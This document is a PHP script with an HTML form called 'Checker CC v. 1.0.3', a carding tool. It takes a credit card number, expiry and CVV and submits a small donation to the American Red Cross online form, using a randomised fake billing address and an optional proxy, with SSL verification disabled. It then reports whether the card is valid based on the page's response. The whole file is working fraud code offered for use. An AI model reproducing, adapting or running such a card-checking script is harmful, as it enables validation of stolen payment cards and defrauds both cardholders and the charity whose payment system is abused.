Checker CC v.1.0.3 | www.pemula.info

1. <?php
2.  
3. /*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
4. * Checker CC v. 1.0.3
5. * -------------------
6. * copyright : © gunnit, 2009
7. *
8. *
9. *
10. * Coded by gunnit [614883]
11. *~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
12.  
13. set_time_limit(0);
14. ignore_user_abort(true);
15. #error_reporting(!E_NOTICE);
16.  
17. if($_POST['x-billfname'] && $_POST['x-billlname'] &&
18. $_POST['x-acc1'] && $_POST['x-acc2'] && $_POST['x-sec1'])
19. {
20. if ( !CheckPHP () ) { echo "Script don't working on this server"; exit(1); }
21.  
22. $first = trim( $_POST['x-billfname'] );
23. $last = trim( $_POST['x-billlname'] );
24.  
25. $cc = trim( $_POST['x-acc1'] );
26. $exp = trim( $_POST['x-acc2'] );
27. $cvv = trim( $_POST['x-sec1'] );
28.  
29. if($_POST['proxy']) $proxy = trim( $_POST['proxy'] );
30. $tmp = explode("~", parse($exp));
31. $month = $tmp[0]; $year = $tmp[1];
32.  
33. #echo "<br>First Name: $first<br>Last Name: $last<br>Street: $street<br>City: $city<br>State/Province: $state<br>ZIP/Postal Code: $zip<br>Country: $country<br>Credit Card Number: $cc<br>CVV Number: $cvv<br>Expiration Date: $month $year<br><br>";
34.  
35. // Checking info
36.  
37. $host = "https://american.redcross.org/site/Donation2?idb=660832234&df_id=1113&1113.donation=form1";
38. $timeout = 120;
39.  
40. $email = "$last@yahoo.com";
41. $country = "United States";
42.  
43. $streets[] = "Sotheby Ct.";
44. $streets[] = "BENNER STREET";
45. $streets[] = "Ambergate Lane";
46. $streets[] = "Purple Sage";
47. $streets[] = "debhill terrace";
48.  
49. #$street = "8713 Sotheby Ct.";
50. $street = rand(100, 9980)." ".$streets[rand(0, count($streets))];
51. $city = "New York";
52. $state = "NY";
53. $zip = rand(10000, 10280);
54.  
55. $gift = rand(5,8);
56.  
57.  
58. if(ereg("^4", $cc)){ $type = 1000; }
59. else if(ereg("^5", $cc)){ $type = 1002; }
60. else if(ereg("^6", $cc)){ $type = 1006; }
61. else if(ereg("^3", $cc)){ $type = 1004; }
62. // Visa 1000
63. // MC 1002
64. // American Express 1004
65. // Discover 1006
66.  
67. $ch = curl_init();
68.  
69. // [1] //
70.  
71. if ($proxy){ curl_setopt($ch, CURLOPT_PROXY, $proxy); }
72. curl_setopt ($ch, CURLOPT_URL, $host);
73. curl_setopt ($ch, CURLOPT_USERAGENT, "Opera/9.0 (Windows NT 5.1; U; en; (R1 1.5))");
74. curl_setopt ($ch, CURLOPT_REFERER, "http://mail.yahoo.com/");
75. curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
76. curl_setopt ($ch, CURLOPT_TIMEOUT, $timeout);
77. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
78. curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
79. $result = curl_exec ($ch);
80.  
81. // <input type="hidden" name="idb" id="idb" value="1709845530" />
82. if (preg_match('<input type="hidden" name="idb" id="idb" value="([^\"]*)" />', $result, $arr1)) $idb = $arr1[1];
83. else { echo "[1] error"; exit(1); }
84.  
85. // <form name="process" id="ProcessForm" action="https://american.redcross.org/site/Donation2?JServSessionIdr001=6pjj43mre1.app196a" method="post"
86. if (preg_match('/action="([^\"]*)" method="post"/', $result, $arr)) $action = $arr[1];
87. else { echo "[1] error"; exit(1); }
88.  
89. echo "[1] idb: $idb<br>[1] action: $action<br><br>";
90. $fp = fopen("content1.html", "w"); fwrite($fp, $result); fclose($fp);
91.  
92. // [2] //
93.  
94. $data = "level_standardsubmit=true&level_standardname=$gift&level_standardsubmit=true&billing_title=&billing_titlesubmit=true&billing_first_namename=$first&billing_first_namesubmit=true&billing_middle_namename=&billing_middle_namesubmit=true&billing_last_namename=$last&billing_last_namesubmit=true&billing_suffix=&billing_suffixsubmit=true&donor_email_addressname=$email&donor_email_addresssubmit=true&donor_email_opt_insubmit=true&billing_addr_street1name=$street&billing_addr_street1submit=true&billing_addr_street2name=&billing_addr_street2submit=true&billing_addr_cityname=$city&billing_addr_citysubmit=true&billing_addr_state=$state&billing_addr_statesubmit=true&billing_addr_zipname=$zip&billing_addr_zipsubmit=true&billing_addr_country=$country&billing_addr_countrysubmit=true&custom_business_name_input=&custom_business_namesubmit=true&tribute_show_honor_fieldssubmit=true&tribute_type=&tribute_typesubmit_skip=true&honoree_title=&honoree_titlesubmit_skip=true&tribute_notify_recip_title=&tribute_notify_recip_titlesubmit_skip=true&custom_tribute_first_name_input=$first&custom_tribute_first_namesubmit=true&tribute_notify_recip_namename=&tribute_notify_recip_namesubmit_skip=true&tribute_notify_recip_street1name=$street&tribute_notify_recip_street1submit_skip=true&tribute_notify_recip_street2name=&tribute_notify_recip_street2submit_skip=true&tribute_notify_recip_cityname=$city&tribute_notify_recip_citysubmit_skip=true&tribute_notify_recip_state=$state&tribute_notify_recip_statesubmit_skip=true&tribute_notify_recip_zipname=$zip&tribute_notify_recip_zipsubmit_skip=true&tribute_notify_recip_country=$country&tribute_notify_recip_countrysubmit_skip=true&tribute_message_bodyname=&tribute_message_bodysubmit_skip=true&tribute_message_closingname=&tribute_message_closingsubmit_skip=true&tribute_message_closingname=&tribute_message_closingsubmit_skip=true&tribute_signaturename=tribute_signaturesubmit_skip=true&payment_typecc_type=$type&payment_typecc_typesubmit=true&payment_typecc_numbername=$cc&payment_typecc_numbersubmit=true&payment_typecc_cvvname=$cvv&payment_typecc_cvvsubmit=true&payment_type_MONTH=$month&payment_type_YEAR=$year&payment_type_DAY=1&payment_typecc_exp_datesubmit=true&payment_typesubmit=true&pstep_next=Next&idb=$idb&df_id=1113&1113.donation=form1";
95.  
96. if ($proxy){ curl_setopt($ch, CURLOPT_PROXY, $proxy); }
97. curl_setopt ($ch, CURLOPT_URL, $action);
98. curl_setopt ($ch, CURLOPT_USERAGENT, "Opera/9.0 (Windows NT 5.1; U; en; (R1 1.5))");
99. curl_setopt ($ch, CURLOPT_REFERER, $host);
100. curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
101. curl_setopt ($ch, CURLOPT_TIMEOUT, $timeout);
102. curl_setopt ($ch, CURLOPT_POST,1);
103. curl_setopt ($ch, CURLOPT_POSTFIELDS, $data);
104. curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 3);
105. curl_setopt ($ch, CURLOPT_RETURNTRANSFER,1);
106. curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
107.  
108. $result = curl_exec ($ch);
109.  
110. if (preg_match('/action="([^\"]*)" method="post"/', $result, $arr)) $action2 = $arr[1];
111. else { echo "[1] error"; exit(1); }
112.  
113. echo "[2] action: $action2<br><br>";
114. $fp = fopen("content2.html", "w"); fwrite($fp, $result); fclose($fp);
115.  
116. // [3] //
117.  
118. $data = "idb=".$idb."&df_id=1113&pstep_finish=Process&1113.donation=form2";
119.  
120. if ($proxy){ curl_setopt($ch, CURLOPT_PROXY, $proxy); }
121. curl_setopt ($ch, CURLOPT_URL, $action2);
122. curl_setopt ($ch, CURLOPT_USERAGENT, "Opera/9.0 (Windows NT 5.1; U; en; (R1 1.5))");
123. curl_setopt ($ch, CURLOPT_REFERER, $action);
124. curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
125. curl_setopt ($ch, CURLOPT_TIMEOUT, $timeout);
126. curl_setopt ($ch, CURLOPT_POST,1);
127. curl_setopt ($ch, CURLOPT_POSTFIELDS, $data);
128. curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 3);
129. curl_setopt ($ch, CURLOPT_RETURNTRANSFER,1);
130. curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
131.  
132. $result = curl_exec ($ch);
133. $fp = fopen("content3.html", "w"); fwrite($fp, $result); fclose($fp);
134.  
135. curl_close ($ch);
136.  
137. if(preg_match("/The credit card was declined. Please check the information that you entered./i", $result)) echo "[-] The credit card was declined";
138. else if(preg_match("/Thank you for your generous gift/i", $result)) echo "[+] CC Valid";
139. else echo "[-] Check error";
140. echo "<br><a href=\"jhistory.go(-1);\">Back</a>";
141. exit(1);
142. }
143.  
144. function parse($date)
145. {
146. $info = explode("/", $date);
147. if($info[0]<10){ $month = str_replace("0", "", $info[0]); }
148. else { $month = $info[0]; }
149. $year = "20".$info[1];
150. return $month."~".$year;
151. }
152.  
153. function CheckPHP()
154. {
155. $n = 1;
156.  
157. $functions[] = "curl_setopt";
158. $functions[] = "curl_exec";
159. $functions[] = "preg_match";
160. $functions[] = "curl_init";
161. $functions[] = "readdir";
162.  
163. echo "<table>";
164. foreach ( $functions as $function )
165. {
166. if ( function_exists ( $function ) )
167. {
168. //echo "<tr><td><font color=green><b>$function</font></td><td><font color=green>OK</b></font></td></tr>";
169. }
170. else
171. {
172. echo "<tr><td><font color=red><b>$function</font></td><td><font color=red>ERROR</b></font></td></tr>";
173. $n = 0;
174. }
175. }
176. echo "</table><br>";
177. return $n;
178. }
179.  
180. ?>
181.  
182. <html xmlns="http://www.w3.org/1999/xhtml"><head id="Head1">
183.  
184. <title>Checker CC by VeX</title><center><b><h2>Checker CC v. 1.0.3</center></b></h2><br>
185. <meta name="Author" content="Andy Rodriguez">
186. <style>
187. body
188. {
189. background-color: #ffffff;
190. }
191.  
192. div.formQuestion
193. {
194. FONT-FAMILY: tahoma, verdana, arial, helvetica, sans-serif;
195. FONT-SIZE: 12px;
196. PADDING-BOTTOM: 2px;
197. PADDING-LEFT: 0px;
198. PADDING-RIGHT: 2px;
199. PADDING-TOP: 2px;
200. FONT-WEIGHT: bold;
201. TEXT-ALIGN: right;
202. }
203.  
204. div.cert
205. {
206. FONT-FAMILY: tahoma, verdana, arial, helvetica, sans-serif;
207. FONT-SIZE: 10px;
208. FONT-COLOR: BLACK;
209. }
210.  
211. div.e-ticket
212. {
213. FONT-WEIGHT: bold;
214. BACKGROUND-COLOR:#CCCCCC;
215. FONT-SIZE: 10px;
216. COLOR: #003366;
217. FONT-FAMILY: tahoma, verdana, arial, helvetica, sans-serif;
218. TEXT-DECORATION: none;
219. }
220.  
221. div.cross
222. {
223. FONT-FAMILY: tahoma, verdana, arial, helvetica, sans-serif;
224. FONT-SIZE: 12px;
225. COLOR: #FF0000;
226. FONT-WEIGHT: bold;
227. }
228.  
229. div.row0
230. {
231. FONT-FAMILY: tahoma, verdana, arial, helvetica, sans-serif;
232. FONT-SIZE: 9px;
233. FONT-COLOR: BLACK;
234. }
235.  
236. tr.row1
237. {
238. FONT-FAMILY: tahoma, verdana, arial, helvetica, sans-serif;
239. FONT-SIZE: 13px;
240. COLOR: #FFFFFF;
241. BORDER-STYLE: solid;
242. BORDER-COLOR: #FFFFFF;
243. BACKGROUND-COLOR: #71879A;
244. TEXT-ALIGN: LEFT;
245. }
246.  
247. tr.row2
248. {
249. FONT-FAMILY: tahoma, verdana, arial, helvetica, sans-serif;
250. FONT-SIZE: 13px;
251. FONT-WEIGHT: BOLD;
252. COLOR: #003366;
253. BORDER-STYLE: solid;
254. BORDER-COLOR: #FFFFFF;
255. BACKGROUND-COLOR: #CCCCCC;
256. }
257.  
258. </style>
259. <style media="Print" type="text/css">
260. body {display:none}
261. </style></head><body bgcolor="#ffffff">
262. <form enctype='multipart/form-data'
263. action='<?php echo $_SERVER["SCRIPT_NAME"]; ?>' method='POST'>
264. <div>
265.  
266. <table align="center" border="0">
267. <tbody><tr>
268. <td>
269. <hook>
270. </hook><table align="center" border="0" width="800"></table>
271.  
272. <table align="center" border="0" bordercolor="#ffffff" cellpadding="0" cellspacing="0" width="800">
273. <tbody><tr>
274. <td colspan="3">
275. <div class="e-ticket"><hook name="etickets">
276. </hook></div><table width="100%">
277.  
278. </tbody></table>
279. </td>
280. </tr>
281.  
282. <tr>
283. <td colspan="2"> <img ilo-full-src="https://secure2.segpay.com/static/blank.gif" src="poset.cgi_files/blank.htm" border="0" height="1" vspace="0" width="560"><br> </td>
284. <td rowspan="11" valign="top">
285. </td>
286. </tr>
287. <tr>
288. <td><div class="formQuestion">* First Name </div></td>
289. <td><div class="formContent"><input name="x-billfname" size="40" maxlength="50" value="" type="text"></div></td>
290. <td>&nbsp;</td>
291. </tr>
292. <tr>
293. <td><div class="formQuestion">* Last Name </div></td>
294. <td><div class="formContent"><input name="x-billlname" size="40" maxlength="50" value="" type="text"></div></td>
295. <td>&nbsp;</td>
296. </tr>
297. <tr>
298. <td align="right"><div class="formQuestion">* Credit Card Number </div></td>
299. <td><div class="formContent"><input name="x-acc1" size="30" maxlength="20" value="" type="text"></div></td>
300. </tr>
301.  
302. <tr>
303. <td align="right"><div class="formQuestion">* Credit Card Expiry (mm/yy) </div></td>
304. <td><div class="formContent"><input name="x-acc2" size="6" maxlength="5" value="" type="text"></div></td>
305. </tr>
306.  
307. <tr>
308. <td align="right"><div class="formQuestion">* Credit Card CVV Number </div></td>
309. <td><div class="formContent"><input name="x-sec1" size="6" maxlength="4" value="" type="text"></div></td>
310. </tr>
311. <tr>
312. <td align="right"><div class="formQuestion">Proxy </div></td>
313. <td><div class="formContent"><input name="proxy" size="15" maxlength="25" value="" type="text"></div></td>
314. </tr>
315. <tr>
316. <td colspan="3" align="center"><div class="formContent">
317. <br><br>
318. <input value="Check CC" type="submit">
319. <input name="reset" type="reset" value="Reset"><br>
320. <label id="mcxtra" name="mcxtra"></label>
321. </font></div></div></div></td>
322. </tr>
323.  
324. </tbody></table>
325. </td>
326. </tr>
327. </tbody></table>
328. </form><br><br><center><b>~~~~~~~~~~~~~~~~~~~~~~<br>Coded by G<br><br>~~~~~~~~~~~~~~~~~~~~~~</center></b>
329. </body></html>